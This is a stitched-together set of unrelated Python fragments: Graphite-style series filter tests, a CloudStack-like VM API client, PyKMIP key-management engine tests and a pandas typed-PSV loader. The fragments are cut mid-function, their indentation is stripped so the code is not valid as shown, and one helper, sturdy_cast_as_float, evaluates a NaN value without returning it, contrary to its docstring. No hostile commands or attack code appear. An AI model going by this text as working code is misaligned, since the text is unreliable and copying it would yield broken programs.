results = functions.removeAbovePercentile({}, seriesList, percent)
for i, result in enumerate(results):
self.assertEqual(return_greater(result, percent), [])
expected_name = "removeAbovePercentile(collectd.test-db{0}.load.value, 50)".format(i + 1)
self.assertEqual(expected_name, result.name)
def test_remove_above_percentile_float(self):
seriesList = self._generate_series_list()
percent = 0.1
results = functions.removeAbovePercentile({}, seriesList, percent)
expected = [[], [], [1]]
for i, result in enumerate(results):
self.assertEqual(return_greater(result, percent), expected[i])
expected_name = "removeAbovePercentile(collectd.test-db{0}.load.value, 0.1)".format(i + 1)
self.assertEqual(expected_name, result.name)
def test_remove_below_percentile(self):
seriesList = self._generate_series_list()
percent = 50
results = functions.removeBelowPercentile({}, seriesList, percent)
expected = [[], [], [1]]
for i, result in enumerate(results):
self.assertEqual(return_less(result, percent), expected[i])
expected_name = "removeBelowPercentile(collectd.test-db{0}.load.value, 50)".format(i + 1)
self.assertEqual(expected_name, result.name)
def test_remove_below_percentile_float(self):
seriesList = self._generate_series_list()
percent = 0.1
results = functions.removeBelowPercentile({}, seriesList, percent)
expected = [[0], [0], []]
for i, result in enumerate(results):
self.assertEqual(return_less(result, percent), expected[i])
expected_name = "removeBelowPercentile(collectd.test-db{0}.load.value, 0.1)".format(i + 1)
self.assertEqual(expected_name, result.name)
def test_remove_above_value(self):
seriesList = self._generate_series_list()
value = 5
results = functions.removeAboveValue({}, seriesList, value)
for i, result in enumerate(results):
self.assertEqual(return_greater(result, value), [])
expected_name = "removeAboveValue(collectd.test-db{0}.load.value, 5)".format(i + 1)
self.assertEqual(expected_name, result.name)
def test_remove_above_value_float(self):
seriesList = self._generate_series_list()
value = 0.1
results = functions.removeAboveValue({}, seriesList, value)
for i, result in enumerate(results):
self.assertEqual(return_greater(result, value), [])
expected_name = "removeAboveValue(collectd.test-db{0}.load.value, 0.1)".format(i + 1)
self.assertEqual(expected_name, result.name)
def test_remove_below_value(self):
seriesList = self._generate_series_list()
value = 5
results = functions.removeBelowValue({}, seriesList, value)
for i, result in enumerate(results):
self.assertEqual(return_less(result, value), [])
expected_name = "removeBelowValue(collectd.test-db{0}.load.value, 5)".format(i + 1)
self.assertEqual(expected_name, result.name)
def test_remove_below_value_float(self):
seriesList = self._generate_series_list()
value = 0.1
results = functions.removeBelowValue({}, seriesList, value)
for i, result in enumerate(results):
self.assertEqual(return_less(result, value), [])
expected_name = "removeBelowValue(collectd.test-db{0}.load.value, 0.1)".format(i + 1)
self.assertEqual(expected_name, result.name)
def test_limit(self):
seriesList = self._generate_series_list()
limit = len(seriesList) - 1
results = functions.limit({}, seriesList, limit)
self.assertEqual(len(results), limit,
"More than {0} results returned".format(limit),
)
def _verify_series_options(self, seriesList, name, value):
"""
Verify a given option is set and True for each series in a
series list
"""
for series in seriesList:
self.assertIn(name, series.options)
| |
options for keys:
id - The ID of the virtual machine
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('destroyVirtualMachine', args)
def rebootVirtualMachine(self, args={}):
'''
Reboots a virtual machine.
args - A dictionary. The following are options for keys:
id - The ID of the virtual machine
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('rebootVirtualMachine', args)
def startVirtualMachine(self, args={}):
'''
Starts a virtual machine.
args - A dictionary. The following are options for keys:
id - The ID of the virtual machine
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('startVirtualMachine', args)
def stopVirtualMachine(self, args={}):
'''
Stops a virtual machine.
args - A dictionary. The following are options for keys:
id - The ID of the virtual machine
forced - Force stop the VM. The caller knows the VM is stopped.
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('stopVirtualMachine', args)
def resetPasswordForVirtualMachine(self, args={}):
'''
Resets the password for virtual machine. The virtual machine must be in a
"Stopped" state and the template must already support this feature for this
command to take effect. [async]
args - A dictionary. The following are options for keys:
id - The ID of the virtual machine
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('resetPasswordForVirtualMachine', args)
def changeServiceForVirtualMachine(self, args={}):
'''
Changes the service offering for a virtual machine. The virtual machine must be
in a "Stopped" state for this command to take effect.
args - A dictionary. The following are options for keys:
id - The ID of the virtual machine
serviceofferingid - the service offering ID to apply to the virtual machine
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
if 'serviceofferingid' not in args:
raise RuntimeError("Missing required argument 'serviceofferingid'")
return self.request('changeServiceForVirtualMachine', args)
def updateVirtualMachine(self, args={}):
'''
Updates parameters of a virtual machine.
args - A dictionary. The following are options for keys:
id - The ID of the virtual machine
displayname - user generated name
group - group of the virtual machine
haenable - true if high-availability is enabled for the virtual machine,
false otherwise
ostypeid - the ID of the OS type that best represents this VM.
userdata - an optional binary data that can be sent to the virtual machine
upon a successful deployment. This binary data must be base64 encoded before
adding it to the request. Currently only HTTP GET is supported. Using HTTP GET
(via querystring), you can send up to 2KB of data after base64 encoding.
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('updateVirtualMachine', args)
def recoverVirtualMachine(self, args={}):
'''
Recovers a virtual machine.
args - A dictionary. The following are options for keys:
id - The ID of the virtual machine
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('recoverVirtualMachine', args)
def listVirtualMachines(self, args={}):
'''
List the virtual machines owned by the account.
args - A dictionary. The following are options for keys:
account - List resources by account. Must be used with the domainId
parameter.
details - comma separated list of host details requested, value can be a
list of [all, group, nics, stats, secgrp, tmpl, servoff, iso, volume, min]. If
no parameter is passed in, the details will be defaulted to all
domainid - list only resources belonging to the domain specified
forvirtualnetwork - list by network type; true if need to list vms using
Virtual Network, false otherwise
groupid - the group ID
hostid - the host ID
hypervisor - the target hypervisor for the template
id - the ID of the virtual machine
isrecursive - defaults to false, but if true, lists all resources from the
parent specified by the domainId till leaves.
keyword - List by keyword
listall - If set to false, list only resources belonging to the command's
caller; if set to true - list resources that the caller is authorized to see.
Default value is false
name - name of the virtual machine
networkid - list by network id
page -
pagesize -
podid - the pod ID
projectid - list firewall rules by project
state - state of the virtual machine
storageid - the storage ID where vm's volumes belong to
zoneid - the availability zone ID
page - Pagination
'''
return self.request('listVirtualMachines', args)
def getVMPassword(self, args={}):
'''
Returns an encrypted password for the VM
args - A dictionary. The following are options for keys:
id - The ID of the virtual machine
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('getVMPassword', args)
def migrateVirtualMachine(self, args={}):
'''
Attempts Migration of a VM to a different host or Root volume of the vm to a
different storage pool
args - A dictionary. The following are options for keys:
virtualmachineid - the ID of the virtual machine
hostid - Destination Host ID to migrate VM to. Required for live migrating a
VM from host to host
storageid - Destination storage pool ID to migrate VM volumes to. Required
for migrating the root disk volume
'''
if 'virtualmachineid' not in args:
raise RuntimeError("Missing required argument 'virtualmachineid'")
return self.request('migrateVirtualMachine', args)
def assignVirtualMachine(self, args={}):
'''
Move a user VM to another user under same domain.
args - A dictionary. The following are options for keys:
account - account name of the new VM owner.
domainid - domain id of the new VM owner.
virtualmachineid - the vm ID of the user VM to be moved
networkids - list of network ids that will be part of VM network after move
in advanced network setting.
securitygroupids - comma separated list of security groups id that going to
be applied to the virtual machine. Should be passed only when vm is moved in a
zone with Basic Network support.
'''
if 'account' not in args:
raise RuntimeError("Missing required argument 'account'")
if 'domainid' not in args:
raise RuntimeError("Missing required argument 'domainid'")
if 'virtualmachineid' not in args:
raise RuntimeError("Missing required argument 'virtualmachineid'")
return self.request('assignVirtualMachine', args)
def restoreVirtualMachine(self, args={}):
'''
Restore a VM to original template or specific snapshot
args - A dictionary. The following are options for keys:
virtualmachineid - Virtual Machine ID
'''
if 'virtualmachineid' not in args:
raise RuntimeError("Missing required argument 'virtualmachineid'")
return self.request('restoreVirtualMachine', args)
def addTrafficType(self, args={}):
'''
Adds traffic type to a physical network
args - A dictionary. The following are options for keys:
physicalnetworkid - the Physical Network ID
traffictype - the trafficType to be added to the physical network
kvmnetworklabel - The network name label of the physical device dedicated to
this traffic on a KVM host
vlan - The VLAN id to be used for Management traffic by VMware host
vmwarenetworklabel - The network name label of the physical device dedicated
to this traffic on a VMware host
xennetworklabel - The network name label of the physical device dedicated to
this traffic on a XenServer host
'''
if 'physicalnetworkid' not in args:
raise RuntimeError("Missing required argument 'physicalnetworkid'")
if 'traffictype' not in args:
raise RuntimeError("Missing required argument 'traffictype'")
return self.request('addTrafficType', args)
def deleteTrafficType(self, args={}):
'''
Deletes traffic type of a physical network
args - A dictionary. The following are options for keys:
id - traffic type id
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('deleteTrafficType', args)
def listTrafficTypes(self, args={}):
'''
Lists traffic types of a given physical network.
args - A dictionary. The following are options for keys:
physicalnetworkid - the Physical Network ID
keyword - List by keyword
page -
pagesize -
page - Pagination
'''
if 'physicalnetworkid' not in args:
raise RuntimeError("Missing required argument 'physicalnetworkid'")
return self.request('listTrafficTypes', args)
def updateTrafficType(self, args={}):
'''
Updates traffic type of a physical network
args - A dictionary. The following are | |
)
args = (
managed_object,
('Digest', [name_a.attribute_value, name_b.attribute_value])
)
regex = "The Digest attribute is unsupported."
six.assertRaisesRegex(
self,
exceptions.InvalidField,
regex,
e._set_attribute_on_managed_object,
*args
)
# Test that a set attribute cannot be overwritten.
length = attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_LENGTH,
128
)
args = (
managed_object,
('Cryptographic Length', length.attribute_value)
)
regex = "Cannot overwrite the Cryptographic Length attribute."
six.assertRaisesRegex(
self,
exceptions.InvalidField,
regex,
e._set_attribute_on_managed_object,
*args
)
# Test that an unsupported attribute cannot be set.
object_group = attribute_factory.create_attribute(
enums.AttributeType.OBJECT_GROUP,
'Test Group'
)
args = (
managed_object,
('Object Group', object_group.attribute_value)
)
regex = "The Object Group attribute is unsupported."
six.assertRaisesRegex(
self,
exceptions.InvalidField,
regex,
e._set_attribute_on_managed_object,
*args
)
def test_is_allowed_by_operation_policy(self):
"""
Test that an allowed operation is correctly allowed by the operation
policy.
"""
e = engine.KmipEngine()
e._operation_policies = {
'test': {
enums.ObjectType.SYMMETRIC_KEY: {
enums.Operation.GET: enums.Policy.ALLOW_OWNER
}
}
}
is_allowed = e._is_allowed_by_operation_policy(
'test',
'test',
'test',
enums.ObjectType.SYMMETRIC_KEY,
enums.Operation.GET
)
self.assertTrue(is_allowed)
def test_is_allowed_by_operation_policy_blocked(self):
"""
Test that an unallowed operation is correctly blocked by the operation
policy.
"""
e = engine.KmipEngine()
e._operation_policies = {
'test': {
enums.ObjectType.SYMMETRIC_KEY: {
enums.Operation.GET: enums.Policy.ALLOW_OWNER
}
}
}
is_allowed = e._is_allowed_by_operation_policy(
'test',
'random',
'test',
enums.ObjectType.SYMMETRIC_KEY,
enums.Operation.GET
)
self.assertFalse(is_allowed)
def test_is_allowed_by_operation_public(self):
"""
Test that a public operation is allowed by the operation policy.
"""
e = engine.KmipEngine()
e._operation_policies = {
'test': {
enums.ObjectType.SYMMETRIC_KEY: {
enums.Operation.GET: enums.Policy.ALLOW_ALL
}
}
}
is_allowed = e._is_allowed_by_operation_policy(
'test',
'test',
'test',
enums.ObjectType.SYMMETRIC_KEY,
enums.Operation.GET
)
self.assertTrue(is_allowed)
is_allowed = e._is_allowed_by_operation_policy(
'test',
'random',
'test',
enums.ObjectType.SYMMETRIC_KEY,
enums.Operation.GET
)
self.assertTrue(is_allowed)
def test_is_allowed_by_operation_block_all(self):
"""
Test that a blocked operation is blocked by the operation policy.
"""
e = engine.KmipEngine()
e._operation_policies = {
'test': {
enums.ObjectType.SYMMETRIC_KEY: {
enums.Operation.GET: enums.Policy.DISALLOW_ALL
}
}
}
is_allowed = e._is_allowed_by_operation_policy(
'test',
'test',
'test',
enums.ObjectType.SYMMETRIC_KEY,
enums.Operation.GET
)
self.assertFalse(is_allowed)
is_allowed = e._is_allowed_by_operation_policy(
'test',
'random',
'test',
enums.ObjectType.SYMMETRIC_KEY,
enums.Operation.GET
)
self.assertFalse(is_allowed)
def test_is_allowed_by_operation_safety_check(self):
"""
Test that an unknown operation is blocked by the operation policy.
"""
e = engine.KmipEngine()
e._operation_policies = {
'test': {
enums.ObjectType.SYMMETRIC_KEY: {
enums.Operation.GET: 'unknown value'
}
}
}
is_allowed = e._is_allowed_by_operation_policy(
'test',
'test',
'test',
enums.ObjectType.SYMMETRIC_KEY,
enums.Operation.GET
)
self.assertFalse(is_allowed)
is_allowed = e._is_allowed_by_operation_policy(
'test',
'random',
'test',
enums.ObjectType.SYMMETRIC_KEY,
enums.Operation.GET
)
self.assertFalse(is_allowed)
def test_is_allowed_by_operation_policy_nonexistent_policy(self):
"""
Test that a check with a non-existent policy yields a logging warning
and a blocked operation.
"""
e = engine.KmipEngine()
e._logger = mock.MagicMock()
policy = 'nonexistent-policy'
is_allowed = e._is_allowed_by_operation_policy(
policy,
'test',
'test',
enums.ObjectType.SYMMETRIC_KEY,
enums.Operation.GET
)
self.assertFalse(is_allowed)
e._logger.warning.assert_called_once_with(
"The '{0}' policy does not exist.".format(policy)
)
def test_is_allowed_by_operation_policy_not_object_applicable(self):
"""
Test that a check for an object with a non-applicable policy yields
a logging warning and a blocked operation.
"""
e = engine.KmipEngine()
e._logger = mock.MagicMock()
e._operation_policies = {
'test': {
enums.ObjectType.SYMMETRIC_KEY: {
enums.Operation.GET: enums.Policy.ALLOW_OWNER
}
}
}
policy = 'test'
object_type = enums.ObjectType.PRIVATE_KEY
is_allowed = e._is_allowed_by_operation_policy(
policy,
'test',
'test',
object_type,
enums.Operation.GET
)
self.assertFalse(is_allowed)
e._logger.warning.assert_called_once_with(
"The '{0}' policy does not apply to {1} objects.".format(
policy,
e._get_enum_string(object_type)
)
)
def test_is_allowed_by_operation_policy_not_applicable(self):
"""
Test that a check with a non-applicable policy yields a logging
warning and a blocked operation.
"""
e = engine.KmipEngine()
e._logger = mock.MagicMock()
e._operation_policies = {
'test': {
enums.ObjectType.SYMMETRIC_KEY: {
enums.Operation.GET: enums.Policy.ALLOW_OWNER
}
}
}
policy = 'test'
object_type = enums.ObjectType.SYMMETRIC_KEY
operation = enums.Operation.CREATE
is_allowed = e._is_allowed_by_operation_policy(
policy,
'test',
'test',
object_type,
operation
)
self.assertFalse(is_allowed)
e._logger.warning.assert_called_once_with(
"The '{0}' policy does not apply to {1} operations on {2} "
"objects.".format(
policy,
e._get_enum_string(operation),
e._get_enum_string(object_type)
)
)
def test_get_object_with_access_controls(self):
"""
Test that an unallowed object access request is handled correctly.
"""
e = engine.KmipEngine()
e._data_store = self.engine
e._data_store_session_factory = self.session_factory
e._data_session = e._data_store_session_factory()
e._logger = mock.MagicMock()
e._client_identity = 'test'
obj_a = pie_objects.OpaqueObject(b'', enums.OpaqueDataType.NONE)
obj_a._owner = 'admin'
e._data_session.add(obj_a)
e._data_session.commit()
e._data_session = e._data_store_session_factory()
id_a = str(obj_a.unique_identifier)
# Test by specifying the ID of the object to retrieve and the
# operation context.
args = [id_a, enums.Operation.GET]
six.assertRaisesRegex(
self,
exceptions.ItemNotFound,
"Could not locate object: {0}".format(id_a),
e._get_object_with_access_controls,
*args
)
def test_create(self):
"""
Test that a Create request can be processed correctly.
"""
e = engine.KmipEngine()
e._data_store = self.engine
e._data_store_session_factory = self.session_factory
e._data_session = e._data_store_session_factory()
e._logger = mock.MagicMock()
attribute_factory = factory.AttributeFactory()
# Build Create request
object_type = attributes.ObjectType(enums.ObjectType.SYMMETRIC_KEY)
template_attribute = objects.TemplateAttribute(
attributes=[
attribute_factory.create_attribute(
enums.AttributeType.NAME,
attributes.Name.create(
'Test Symmetric Key',
enums.NameType.UNINTERPRETED_TEXT_STRING
)
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_ALGORITHM,
enums.CryptographicAlgorithm.AES
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_LENGTH,
256
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_USAGE_MASK,
[
enums.CryptographicUsageMask.ENCRYPT,
enums.CryptographicUsageMask.DECRYPT
]
),
attribute_factory.create_attribute(
enums.AttributeType.OPERATION_POLICY_NAME,
'test'
)
]
)
payload = create.CreateRequestPayload(
object_type,
template_attribute
)
response_payload = e._process_create(payload)
e._data_session.commit()
e._data_session = e._data_store_session_factory()
e._logger.info.assert_any_call(
"Processing operation: Create"
)
uid = response_payload.unique_identifier.value
self.assertEqual('1', uid)
# Retrieve the stored object and verify all attributes were set
# appropriately.
symmetric_key = e._data_session.query(
pie_objects.SymmetricKey
).filter(
pie_objects.ManagedObject.unique_identifier == uid
).one()
self.assertEqual(
enums.KeyFormatType.RAW,
symmetric_key.key_format_type
)
self.assertEqual(1, len(symmetric_key.names))
self.assertIn('Test Symmetric Key', symmetric_key.names)
self.assertEqual(256, len(symmetric_key.value) * 8)
self.assertEqual(
enums.CryptographicAlgorithm.AES,
symmetric_key.cryptographic_algorithm
)
self.assertEqual(256, symmetric_key.cryptographic_length)
self.assertEqual(2, len(symmetric_key.cryptographic_usage_masks))
self.assertIn(
enums.CryptographicUsageMask.ENCRYPT,
symmetric_key.cryptographic_usage_masks
)
self.assertIn(
enums.CryptographicUsageMask.DECRYPT,
symmetric_key.cryptographic_usage_masks
)
self.assertEqual('test', symmetric_key.operation_policy_name)
self.assertIsNotNone(symmetric_key.initial_date)
self.assertNotEqual(0, symmetric_key.initial_date)
self.assertEqual(uid, e._id_placeholder)
def test_create_unsupported_object_type(self):
"""
Test that an InvalidField error is generated when attempting to
create an unsupported object type.
"""
e = engine.KmipEngine()
e._data_store = self.engine
e._data_store_session_factory = self.session_factory
e._data_session = e._data_store_session_factory()
e._logger = mock.MagicMock()
object_type = attributes.ObjectType(enums.ObjectType.PUBLIC_KEY)
payload = create.CreateRequestPayload(
object_type
)
args = (payload, )
regex = "Cannot create a PublicKey object with the Create operation."
six.assertRaisesRegex(
self,
exceptions.InvalidField,
regex,
e._process_create,
*args
)
e._logger.info.assert_any_call(
"Processing operation: Create"
)
def test_create_omitting_attributes(self):
"""
Test that InvalidField errors are generated when trying to create
a symmetric key without required attributes.
"""
e = engine.KmipEngine()
e._data_store = self.engine
e._data_store_session_factory = self.session_factory
e._data_session = e._data_store_session_factory()
e._logger = mock.MagicMock()
attribute_factory = factory.AttributeFactory()
# Test the error for omitting the Cryptographic Algorithm
object_type = attributes.ObjectType(enums.ObjectType.SYMMETRIC_KEY)
template_attribute = objects.TemplateAttribute(
attributes=[
attribute_factory.create_attribute(
enums.AttributeType.NAME,
attributes.Name.create(
'Test Symmetric Key',
enums.NameType.UNINTERPRETED_TEXT_STRING
)
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_LENGTH,
256
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_USAGE_MASK,
[
enums.CryptographicUsageMask.ENCRYPT,
enums.CryptographicUsageMask.DECRYPT
]
)
]
)
payload = create.CreateRequestPayload(
object_type,
template_attribute
)
args = (payload, )
regex = (
"The cryptographic algorithm must be specified as an attribute."
)
six.assertRaisesRegex(
self,
exceptions.InvalidField,
regex,
e._process_create,
*args
)
e._logger.info.assert_any_call(
"Processing operation: Create"
)
e._logger.reset_mock()
# Test the error for omitting the Cryptographic Length
object_type = attributes.ObjectType(enums.ObjectType.SYMMETRIC_KEY)
template_attribute = objects.TemplateAttribute(
attributes=[
attribute_factory.create_attribute(
enums.AttributeType.NAME,
attributes.Name.create(
'Test Symmetric Key',
enums.NameType.UNINTERPRETED_TEXT_STRING
)
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_ALGORITHM,
enums.CryptographicAlgorithm.AES
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_USAGE_MASK,
[
enums.CryptographicUsageMask.ENCRYPT,
enums.CryptographicUsageMask.DECRYPT
]
)
]
)
payload = create.CreateRequestPayload(
object_type,
template_attribute
)
args = (payload, )
regex = (
"The cryptographic length must be specified as an attribute."
)
six.assertRaisesRegex(
self,
exceptions.InvalidField,
regex,
e._process_create,
*args
)
e._logger.info.assert_any_call(
"Processing operation: Create"
)
e._logger.reset_mock()
# Test the error for omitting the Cryptographic Usage Mask
object_type = attributes.ObjectType(enums.ObjectType.SYMMETRIC_KEY)
template_attribute = objects.TemplateAttribute(
attributes=[
attribute_factory.create_attribute(
enums.AttributeType.NAME,
attributes.Name.create(
'Test Symmetric Key',
enums.NameType.UNINTERPRETED_TEXT_STRING
)
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_ALGORITHM,
enums.CryptographicAlgorithm.AES
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_LENGTH,
256
)
]
)
payload = create.CreateRequestPayload(
object_type,
template_attribute
)
args = (payload, )
regex = (
"The cryptographic usage mask must be specified as an attribute."
)
six.assertRaisesRegex(
self,
exceptions.InvalidField,
regex,
e._process_create,
*args
)
e._logger.info.assert_any_call(
"Processing operation: Create"
)
e._logger.reset_mock()
def test_create_key_pair(self):
"""
Test that a CreateKeyPair request can be processed correctly.
"""
e = engine.KmipEngine()
e._data_store = self.engine
e._data_store_session_factory = self.session_factory
e._data_session = e._data_store_session_factory()
e._logger = mock.MagicMock()
attribute_factory = factory.AttributeFactory()
common_template = objects.CommonTemplateAttribute(
attributes=[
attribute_factory.create_attribute(
enums.AttributeType.NAME,
attributes.Name.create(
'Test Asymmetric Key',
enums.NameType.UNINTERPRETED_TEXT_STRING
)
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_ALGORITHM,
enums.CryptographicAlgorithm.RSA
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_LENGTH,
2048
)
]
)
public_template = objects.PublicKeyTemplateAttribute(
attributes=[
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_USAGE_MASK,
[
enums.CryptographicUsageMask.ENCRYPT
]
)
]
)
private_template = objects.PrivateKeyTemplateAttribute(
attributes=[
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_USAGE_MASK,
[
enums.CryptographicUsageMask.DECRYPT
]
)
]
)
payload = create_key_pair.CreateKeyPairRequestPayload(
common_template,
private_template,
public_template
)
response_payload = e._process_create_key_pair(payload)
e._data_session.commit()
e._data_session = e._data_store_session_factory()
e._logger.info.assert_any_call(
"Processing operation: CreateKeyPair"
)
public_id = response_payload.public_key_uuid.value
self.assertEqual('1', public_id)
private_id = response_payload.private_key_uuid.value
self.assertEqual('2', private_id)
# Retrieve the stored public key and verify all attributes were set
# appropriately.
public_key = e._data_session.query(
pie_objects.PublicKey
).filter(
pie_objects.ManagedObject.unique_identifier == public_id
).one()
self.assertEqual(
enums.KeyFormatType.PKCS_1,
public_key.key_format_type
)
self.assertEqual(1, len(public_key.names))
self.assertIn('Test Asymmetric Key', public_key.names)
self.assertEqual(
enums.CryptographicAlgorithm.RSA,
public_key.cryptographic_algorithm
)
self.assertEqual(2048, public_key.cryptographic_length)
self.assertEqual(1, len(public_key.cryptographic_usage_masks))
self.assertIn(
enums.CryptographicUsageMask.ENCRYPT,
public_key.cryptographic_usage_masks
)
self.assertEqual('default', public_key.operation_policy_name)
self.assertIsNotNone(public_key.initial_date)
self.assertNotEqual(0, public_key.initial_date)
# Retrieve the stored private key and verify all attributes were set
# appropriately.
private_key = e._data_session.query(
pie_objects.PrivateKey
).filter(
pie_objects.ManagedObject.unique_identifier == private_id
).one()
self.assertEqual(
enums.KeyFormatType.PKCS_8,
private_key.key_format_type
)
self.assertEqual(1, len(private_key.names))
self.assertIn('Test Asymmetric Key', private_key.names)
self.assertEqual(
enums.CryptographicAlgorithm.RSA,
private_key.cryptographic_algorithm
| |
then will load the analyze table.
"""
return_type = None
if type(source_tables) == list:
return_type = 'list'
elif type(source_tables) == str:
# single table (as string) passed... expecting to return full table
source_tables = [source_tables]
return_type = 'dataframe'
elif type(source_tables) == dict:
# single table (as dict) passed... likely with subsetting query, but not req'd
source_tables = [source_tables]
return_type = 'dataframe'
source_tables_proper = []
reassign = False
for s in source_tables:
if type(s) == str:
# convert list of strings into a list of dicts
reassign = True
d = {}
d['table_name'] = s
source_tables_proper.append(d)
if reassign:
# replace source_tables with reformatted version
source_tables = source_tables_proper
dfs = []
if fetch is True:
if not conn:
# create connection object
try:
rpc = Connect()
except:
logger.exception('Could not connect via RPC')
return False
conn = Connection(project=rpc.project_id)
for s in source_tables:
# create table objects if they don't exist
if s.get('table_object') == None:
s['table_object'] = Table(conn, s.get('table_name'))
downloads = download(source_tables, configuration=configuration, conn=conn, clean=clean)
for d in downloads:
df = d.get('df')
name_of_df = '{0}.psv'.format(d.get('name'))
if name_of_df.startswith('/'):
name_of_df = name_of_df[1:]
if cache_locally is True:
with open(os.path.join(configuration['LOCAL_STORAGE'], name_of_df), 'w') as f:
save_typed_psv(df, f)
dfs.append(df)
else:
for s in source_tables:
source_table = '{0}.psv'.format(s.get('table_name'))
source_path = os.path.join(configuration['LOCAL_STORAGE'], source_table)
df = load_typed_psv(source_path)
dfs.append(df)
if return_type == 'dataframe':
return dfs[0]
else:
return dfs
def load_new(source_tables, sep='|', fetch=True, cache_locally=False, configuration=None, connection=None):
"""Load frame(s) from requested source
If local, will load from the typed_psv. If Analyze, then will load the analyze table.
TODO: Make it fetch from analyze table....really this should be assimilated with dwim once dwim works again.
TODO: Make it go to analyze and cache locally, if requested to do so.
"""
if connection:
configuration['project_id'] = connection.project_id
if fetch is True:
download(source_tables, configuration)
dfs = []
for source_table in source_tables:
_, table_name = posixpath.split(source_table)
source_path = '{}/{}.psv'.format(configuration['LOCAL_STORAGE'], source_table)
df = load_typed_psv(source_path)
dfs.append(df)
return dfs
def dtype_from_sql(sql):
"""Gets a pandas dtype from a SQL data type
Args:
sql (str): The SQL data type
Returns:
str: the pandas dtype equivalent of `sql`
"""
mapping = {
'boolean': 'bool',
'text': 'object',
'smallint': 'int16',
'integer': 'int32',
'bigint': 'int64',
'numeric': 'float64',
'timestamp': 'datetime64[s]',
'interval': 'timedelta64[s]',
'date': 'datetime64[s]',
'time': 'datetime64[s]',
}
return mapping.get(str(sql).lower(), None)
def sturdy_cast_as_float(input_val):
"""
Force a value to be of type 'float'. Sturdy and unbreakeable.
Works like data_helpers.cast_as_float except it returns NaN and None
in cases where such seems appropriate, whereas the former forces to 0.0.
"""
if input_val is None:
return 0.0
try:
if np.isnan(input_val):
float('nan')
else:
try:
return float(input_val)
except ValueError:
return None
except:
try:
return float(input_val)
except ValueError:
return None
def converter_from_sql(sql):
"""Gets a pandas converter from a SQL data type
Args:
sql (str): The SQL data type
Returns:
str: the pandas converter
"""
mapping = {
'boolean': bool,
'text': str,
'smallint': int,
'integer': int,
'bigint': int,
#'numeric': float, #dh.cast_as_float,
#'numeric': dh.cast_as_float,
'numeric': sturdy_cast_as_float,
'timestamp': pd.datetime,
'interval': pd.datetime,
'date': pd.datetime,
'time': pd.datetime,
}
return mapping.get(str(sql).lower(), str(sql).lower())
def load_typed_psv(infile, sep='|', **kwargs):
""" Loads a typed psv into a pandas dataframe. If the psv isn't typed,
loads it anyway.
Args:
infile (str): The path to the input file
sep (str, optional): The separator used in the input file
"""
#TODO: for now we just ignore extra kwargs - we accept them to make it a
#little easier to convert old to_csvs and read_csvs. In the future, we
#should probably pass as many of them as possible on to to_csv/read_ccsv -
#the only issue is we have to make sure the header stays consistent.
if isinstance(infile, six.string_types):
if os.path.exists(infile):
buf = open(infile, 'rb')
else:
logger.exception('File does not exist: {0}'.format(infile))
return False
else:
buf = infile
try:
headerIO = six.BytesIO(buf.readline()) # The first line needs to be in a separate iterator, so that we don't mix read and iter.
header = next(csv.reader(headerIO, delimiter=sep)) # Just parse that first line as a csv row
names_and_types = [h.split(CSV_TYPE_DELIMITER) for h in header]
column_names = [n[0] for n in names_and_types]
try:
dtypes = {
name: dtype_from_sql(sqltype)
for name, sqltype in names_and_types
}
except ValueError:
# Missing sqltype - looks like this is a regular, untyped csv.
# Let's hope that first line was its header.
dtypes = None
converters={}
#for name, sqltype in names_and_types:
#converter = converter_from_sql(sqltype)
#if converter:
#converters[name] = converter
try:
converters = {
name: converter_from_sql(sqltype)
for name, sqltype in names_and_types
}
except ValueError:
# Missing sqltype - looks like this is a regular, untyped csv.
# Let's hope that first line was its header.
converters = None
# This will start on the second line, since we already read the first line.
#return pd.read_csv(buf, header=None, names=column_names, dtype=dtypes, sep=sep)
na_values = [
#'', # This was here, and then commented out, and I'm putting it back in 20180824. ***
# # If it isn't here, we fail when attempting to import a delimited file of type 'numeric'
# # it is coming in as null/empty (e.g. the last record in the following set:)
# # LE::text|PERIOD::text|RC::text|MGCOA::text|VT::text|TP::text|FRB::text|FUNCTION::text|DCOV::numeric|LOCAL_CURRENCY::text|CURRENCY_RATE::numeric|DCOV_LC::numeric
# # LE_0585|2018_01|6019999|6120_NA|VT_0585|TP_NA|FRB_AP74358|OM|0.00031|EUR|0.8198|0.000254138
# # LE_0003|2018_07|CA10991|5380_EBITX|VT_9988|TP_NA|FRB_APKRA15|OM|-0.00115|INR|68.7297|-0.079039155
# # LE_2380|2017_08|AP92099|Q_5010_EBITX|VT_0585|TP_NA|FRB_AP92099|RE|99|||
'#N/A',
'#N/A N/A',
'#NA',
'-1.#IND',
'-1.#QNAN',
'-NaN',
'-nan',
'1.#IND',
'1.#QNAN',
'N/A',
'NA',
'NULL',
'NaN',
'n/a',
'nan',
'null'
]
parse_dates = []
if dtypes is not None:
for k, v in six.iteritems(dtypes):
dtypes[k] = v.lower()
#Handle inbound dates
#https://stackoverflow.com/questions/21269399/datetime-dtypes-in-pandas-read-csv
